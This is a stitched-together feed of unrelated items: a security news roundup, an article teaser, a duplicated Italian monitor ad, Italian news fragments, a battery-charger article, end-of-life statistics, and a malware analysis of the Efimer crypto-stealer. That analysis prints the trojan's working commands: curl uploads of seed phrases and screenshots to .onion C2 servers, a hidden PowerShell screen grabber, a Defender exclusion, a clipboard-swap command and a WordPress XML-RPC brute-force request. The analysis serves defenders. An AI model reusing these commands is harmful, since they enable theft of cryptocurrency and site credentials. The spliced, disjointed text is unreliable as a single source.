The Internet is fighting over whether robots.txt applies to AI agents. It all started when Cloudflare published a blog post, detailing what the company was seeing from Perplexity crawlers. Of course, automated web crawling is part of how the modern Internet works, and almost immediately after the first web crawler was written, one managed to DoS (Denial of Service) a web site back in 1994. And the robots.txt file was first designed.
Make no mistake, robots.txt on its own is nothing more than a polite request for someone else on the Internet to not index your site. The more aggressive approach is to add rules to a Web Application Firewall (WAF) that detects and blocks a web crawler based on the user-agent string and source IP address. Cloudflare makes the case that Perplexity is not only intentionally ignoring robots.txt, but also actively disguising their webcrawling traffic by using IP addresses outside their normal range for these requests.
And there’s genuinely an interesting argument to be made,that robots.txt is aimed at indexing and AI training traffic, and that agentic AI requests are a different category. Put simply, perplexity bots ignore robots.txt when a live user asks them to. Is that bad behavior, or what we should expect? This question will have to be settled as AI agents become more common.
Breaking Into the Vault
Researchers at Cisco Talos took a look at the Dell ControlVault, a Hardware Security Module (HSM) built into many Dell laptops. The firmware running on these embedded processors had some problems, including a stack-overflow and other memory-related issues. Usually the potential for abuse of these kind of attacks is limited mostly to the theoretical realm, but this embedded HSM also includes accessible USB pins, that can be accessed with a custom connector. The vulnerabilities found, then represent a real attack scenario where the firmware on the HSM can be tampered with, via nothing more than physical access. To prove the point, the Talos write-up includes a great video of a compromised machine accepting a green onion as a valid fingerprint for Windows Login.
Trend Micro In the Wild
Trend Micro’s Apex One system is under active exploitation, as a pair of vulnerabilities allow an authenticated attacker to inject system commands in the system’s management console. The full fix is expected to roll out later this month, but a mitigation disables a specific feature of the console, the Remote Install Agent. This leads to the obvious conclusion that the installation process was allowing for code execution as part of the install process.
GreedyBear
There was an interesting malware campaign run this year, by a group that Koi Security is calling GreedyBear. The campaign could be called a blitz, where malicious browser extensions, ransomware binaries, and scammy websites were all employed at once, with the goal of stealing cryptocurrency. The surprising thing is that so far not much over $1 million has been reported as stolen through the campaign.
The first technique used was “Extension Hollowing”, where safe, boring browser extensions are published, and maintained for a few months. Good reviews come in naturally or are purchased, and the publisher appears trustworthy. Then the extension is updated, with malicious code suddenly shipping. These extensions are now sniffing for user input and form filled data.
The second technique used was the old classic, packing malware into cracked and pirated software. The source of many of these malicious binaries seems to be primarily Russian piracy sites.
The final approach discovered was the simple scam website, often typo-squatting on nearly-legitimate domain names. These sites advertised fake hardware wallets or wallet repair, but only existed to steal whatever information would-be customers were willing to share.
The question may be raised, why does Koi Security believe all this activity is connected? The answer boils down to a single IP address, 185.208.156.66. This was the Command and Control server for the entire network of activity, and should be seen as a definite red flag in logs and records.
HashiCorp Vault Audit
The fine folks at Cyata took a crack at HashiCorp’s Vault, a source available secrets storage solution. And they discovered a host of subtle but important issues. The first on the list is an outstanding find, and it deals with how Vault protects against brute-force attacks. It’s supposed to be a simple counter, that locks out password attempts for a while, once a threshold of failures has been reached. The problem is that usernames aren’t case sensitive, but the failure counter is case sensitive in tracking password failures. Tried guessing the admin password too many times? Try the Admin account next.
The Multi-Factor Authentication has some issues, like the TOTP code reuse protection. This attempts to enforce that a code is only used once while valid. The problem is that a code of “ 123456” and “123456” both evaluate the same for the TOTP valuation itself, but as different codes for the reuse protection. This could enable an attacker to first abuse the reuse protection error message to identify a valid but used code, and then insert the space to be able to use the code for authentication.
After authentication, this same style of attack is possible again, this time targeting the root policy protections. An admin cannot assign this “root” policy, but can assign a “ root” policy. Those are treated as different policy identifiers by the validation code, but the same thing in the final implementation.
And finally, they discovered a Remote Code Execution flaw, via plugin installation. This one requires admin access, but an information leak and an audit log that allows writing to anywhere on the disk is enough to execute code injected in that audit log. This seems to be the first RCE ever made public in Vault, which is an impressive statement for both Hashicorp and Cyata.
Bits and Bytes
Nvidia isn’t taking last week’s talk of backdoors laying down, taking the offensive this week to reassure everyone that “There are no back doors in NVIDIA chips.” There’s a separate bit of news that US lawmakers are considering legislation that would require a kill-switch and location verification in future hardware.
It’s reassuring to be reminded that cyber-criminals do get captured and extradited. A Nigerian man was arrested in France and is being extradited to the US on multiple charges of fraud, identity theft, and other crimes. No word on whether the Nigerian national was or has claimed to be a prince.
And finally, filed in the “awkward” category, Google has disclosed that they were also a victim in the Salesforce hacks that Google researchers discovered and first publicized. These were good-old social engineering campaigns, where the attacker contacted an employee at the target company, and convinces them to read off an eight-digit security code. A group calling itself ShinyHunters has started an exploitation campaign using data pilfered in the attacks.
The Halo 3C is a vape detector installed in schools and public housing. A young hacker found it contains microphones and that it can be turned into an audio bug, raising privacy concerns.#News #Hacking
A couple of years ago, a curious, then-16-year-old hacker named Reynaldo Vasquez-Garcia was on his laptop at his Portland-area high school, seeing what computer systems he could connect to via the Wifi—“using the school network as a lab,” as he puts it—when he spotted a handful of mysterious devices with the identifier “IPVideo Corporation.”
After a closer look and some googling, Garcia figured out that a company by that name was a subsidiary of Motorola, and the devices he’d found in his school seemed to be something called the Halo 3C, a “smart” smoke and vape detection gadget. “They look just like smoke detectors, but they have a whole bunch of features like sensors and stuff,” Garcia says.
As he read more, he was intrigued to learn that the Halo 3C goes beyond detecting smoke and vaping—including a distinct feature for discerning THC vaping in particular. It also has a microphone for listening out for “aggression,” gunshots, and keywords such as someone calling for help, a feature that to Vasquez-Garcia immediately raised concerns of more intrusive surveillance.
Upgrade to continue reading
Become a paid member to get access to all premium content Upgrade
Vendo monitor 23" Dell U2312HM, condizioni estetiche perfette, neanche un graffietto. Pixel perfetti, non c'è n'è uno bruciato o spento. Il connettore VGA balla leggermente: se spostate il pc tutti giorni da un po' fastidio, se lo tenete fisso, non ci sono problemi.
Sono inclusi il cavo di alimentazione e quello VGA/HDMI.
Zona di consegna Milano/Pavia. Visto il prezzo e le dimensioni, non credo convenga la spedizione.
Vendo monitor 23" Dell U2312HM, condizioni estetiche perfette, neanche un graffietto. Pixel perfetti, non c'è n'è uno bruciato o spento. Il connettore VGA balla leggermente: se spostate il pc tutti giorni da un po' fastidio, se lo tenete fisso, non ci sono problemi.
Sono inclusi il cavo di alimentazione e quello VGA/HDMI.
Zona di consegna Milano/Pavia. Visto il prezzo e le dimensioni, non credo convenga la spedizione.
Price: 50 € :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
@Informatica (Italy e non Italy 😁) Documenti d’identità rubati dagli hotel italiani, decine di migliaia in vendita sul dark web. A finire sotto attacco sarebbero state tre strutture ricettive del nostro Paese, tutte prese di mira tra giugno e luglio 2025. Oggi il CERT AGID ha comunicato
The Texas Instruments TP4056 is the default charge-controller chip for any maker or hacker working with lithium batteries. And why not? You can get perfectly-functional knockoffs on handy breakout boards from the usual online sources for pennies. Betteridge’s Law aside, [Lefty Maker] thinks that it may well be time to move on from the TP4056 and spends his latest video telling us why, along with promoting an alternative.
His part of choice is another TI chip, the BQ25185. [Lefty] put together his own charge controller board to show off the capabilities of this chip — including variable under- and over-charge protection voltages. Much of his beef with the TP4056 has less to do with that chip than with the cheap charge modules it comes on: when he crows about the lack of mounting holes and proper USB-PD on the knock-off modules, it occurs to us he could have had those features on his board even if he’d used a TP4056.
On the other hand, the flexibility offered by the BQ25185 is great to future-proof projects in case the dominant battery chemistry changes, or you just change your mind about what sort of battery you want to use. Sure, you’d need to swap a few resistors to set new trigger voltages and charging current, but that beats starting from scratch.
[Lefty Maker] also points out some of the advantages to making your own boards rather than relying on cheap modules. Namely, you can make them however you want. From a longer USB port to indicator LEDs and a built-in battery compartment, this charging board is exactly what [Lefty Maker] wants. Given how cheap custom PCBs are these days, it’s not hard to justify rolling your own.
The same cannot be said of genuine TI silicon, however. While the BQ25185 has a few good features that [Lefty Maker] points out in the video, we’re not sure the added price is worth it. Sure, it’s only a couple bucks, but that’s more than a 300% increase!
Negli ultimi anni l’Esercito statunitense ha accelerato lo sviluppo delle armi a energia diretta, e sulla base dei risultati ottenuti ne sta valutando un impiego più ampio anche nel contesto della difesa antimissile. “Le tecnologie per i laser a energia
Si è registrato un aumento del 14% delle richieste arrivate alla nostra infoline: da Liguria e Lazio il maggior numero di chiamate in proporzione al numero degli abitanti
580 le richieste di aiuto alla morte volontaria
Negli ultimi 12 mesi sono arrivate 16.035 richieste di informazioni sul fine vita tramite ilNumero Bianco(06 9931 3409), coordinato da Valeria Imbrogno, compagna di Dj Fabo, e attraverso le email dirette all’Associazione Luca Coscioni. Una media di 44 richieste al giorno, in crescita del 14 per cento rispetto all’anno precedente.
Si tratta di un servizio attivo tutti i giorni per ascoltare, orientare e informare sulle possibilità offerte oggi dall’ordinamento italiano in materia di fine vita, su temi come eutanasia e suicidio medicalmente assistito, testamento biologico, interruzione delle terapie e sedazione palliativa profonda. In assenza di risposte istituzionali adeguate, il servizio aiuta a costruire percorsi legali e umani verso la libertà di scelta sul fine vita.
Nel dettaglio, le richieste hanno riguardato soprattutto eutanasia e suicidio medicalmente assistito (circa 5 al giorno), ma anche interruzione delle terapie e sedazione palliativa profonda (più di una al giorno). Sono inoltre aumentate le domande pratiche per accedere alla morte volontaria medicalmente assistita in Svizzera o attraverso percorsi legali in Italia, arrivate da 580 persone (51 per cento donne, 49 per cento uomini), contro le 533 dell’anno precedente.
Sulla base delle informazioni disponibili sulla provenienza geografica di chi ha contattato il servizio, quando fornite, è stata elaborata una proiezione regionale ponderata per popolazione, che restituisce una fotografia della richiesta di aiuto a morire in Italia.
datawrapper.dwcdn.net/jsJTr/1/!function(){"use strict";window.addEventListener("message",function(a){if(void 0!==a.data["datawrapper-height"]){var e=document.querySelectorAll("iframe");for(var t in a.data["datawrapper-height"])for(var r,i=0;r=e[i];i++)if(r.contentWindow===a.source){var d=a.data["datawrapper-height"][t]+"px";r.style.height=d}}})}();
La classifica delle regioni con il maggior numero di richieste rapportate a 100.000 abitanti vede al primo posto la Liguria con 48 ogni 100.000 abitanti, seguita dal Lazio con 43 richieste. Al terzo posto si posiziona la Toscana con 35, affiancata dal Friuli Venezia Giulia. Seguono Umbria, Emilia-Romagna e Lombardia con 33 richieste. Poi Piemonte con 28, il Veneto e le Marche con 26.
@Giornalismo e disordine informativo articolo21.org/2025/08/netanyo… Netanyahu gioca a fare l’ONU. Con una sua personale risoluzione ha deciso di occupare Gaza con l’esercito in modalità caschi blu e poi consegnarla ad una lega araba in versione peace-keeping. Il tutto chiedendo ai gazawi di auto-deportarsi nel sud della Striscia, incurante di creare un campo di concentramento con una densità altissima, pur di
@Giornalismo e disordine informativo articolo21.org/2025/08/italia-… Oggi, 8 agosto 2025, segna una data storica per la libertà di stampa in Europa: entra ufficialmente in vigore l’European Media Freedom Act (EMFA), il regolamento che rafforza le garanzie di indipendenza e pluralismo
In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.
Report summary:
Efimer is spreading through compromised WordPress sites, malicious torrents, and email.
It communicates with its command-and-control server via the Tor network.
Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns.
Kaspersky products classify this threat with the following detection verdicts:
HEUR:Trojan-Dropper.Script.Efimer
HEUR:Trojan-Banker.Script.Efimer
HEUR:Trojan.Script.Efimer
HEUR:Trojan-Spy.Script.Efimer.gen
Technical details
Background
In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed “Efimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.
Part of the script with comments
Email distribution
The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained “details” about the alleged infringement and the proposed buyout amount.
Sample email
In a recent phishing attempt, targets received an email with a ZIP attachment named “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named “PASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase “S”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.
Archive contents
If the user unzips the password-protected archive, they’ll find a malicious file named “Requirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message.
Error message
Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level:
If the script is executed on behalf of a privileged user, it adds the C:\\Users\\Public\\controller folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\\Windows\\System32\\exe and C:\\Windows\\System32\\cmd.exe. Following this, the script saves two files to the aforementioned path: “controller.js” (containing the Efimer Trojan) and “controller.xml”. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml.
If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility.
Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.
Efimer Trojan
The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server.
The Trojan starts by using WMI to check if Task Manager is running.
If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server.
The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:
The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates.
Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.
The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.
The script then tries to load a file named “SEED” from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.
At this point, the controller concludes its initialization process and enters its main operation cycle.
The main loop
In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.
If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timer variable).
As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timer decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.
The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile. curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named “cfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.
Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses.
First, it scans the clipboard for strings that look like mnemonic (seed) phrases.
If it finds any, these phrases are saved to a file named “SEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.
They are captured with the help of the following PowerShell command: powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();" The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.
Screenshots are sent to the following path on the server: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php Files are also sent via a curl command: curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '" After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:
Short Bitcoin wallet addresses (starting with “1” or “3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address.
For long wallet addresses that start with “bc1q” or “bc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original.
If a wallet address begins with “0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address.
For Monero addresses that start with “4” or “8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with “4”.
This clipboard swap is typically executed with the help of the following command: cmd.exe /c echo|set/p= + new_clipboard_data + |clip After each swap, the script sends data to the server about both the original wallet and the replacement.
Distribution via compromised WordPress sites
As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.
Here’s an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/
The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a “readme !!!.txt” text file, and an executable that masquerades as a media player. Downloaded files
To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\\Users\\Public\\Controller folder, but it’s named “ntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named “ntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the “Controller” folder to Windows Defender exclusions. cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\' The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with “vt05”.
Additional scripts
On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.
WordPress site compromise
Among these additional scripts, we found a file named “btdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.
Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\\Users\\Public\\Controller\\.
The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the “B” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter “B”.
After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.
Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the “B” parameter, kicking off a brute-force attack.
The script’s operation cycle involves both the brute-force code and the handler for its core logic
The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.
The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.
After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.
Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.
Part of the getSeDomains function
The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named “UDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains.
For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this: <?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall> When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.
This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.
Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the “B” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW.
The ObjGetW function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObj function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.
Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.
When attempting to guess a password for each user, a web page post request is sent via the WPTryPost function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.
After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.
Successfully guessed passwords are sent to the C2 with the GOOD command.
Alternative Efimer version
We also discovered another script named “assembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.
Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment.
If it detects a VM, it prefixes the GUID string with a “V”; otherwise, it uses an “R”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden.
After that, a file named “lptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the “lptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.
After that, the script attempts to read data from a file named “geip”, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe.
Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.
It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.
The script then reads a file named “data” from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at: http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands:
RPLY returns “OK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns “OK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established.
EVAL executes a JavaScript script provided in the response.
KILL completely removes all of the malware’s components and terminates its operation.
Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.
Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named “data”. After these steps, the entire cycle repeats.
“Liame” email address harvesting script
This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail.
At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.
Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.
Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.
The request includes the following parameters:
LIAM: unique identifier
action: request type
data: data corresponding to the request type
In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.
If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message.
The request is sent to the following C2 address: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php The server returns a JSON-like structure, which the next function later parses.
The structure dictates the commands the script should execute.
This script supports two primary functions:
Get a list of email addresses from domains provided by the server
The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.
The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.
The PageGetLiame function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated within mailto links .
Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.
Exfiltrate collected data to the server In this scenario, the script anticipates two parameters from the C2 server’s response: pstack and buffer, where:
pstack is an array of domains to which subsequent POST requests will be sent;
buffer is an array of strings, each containing data in the format of address,subject,message.
The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.
If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.
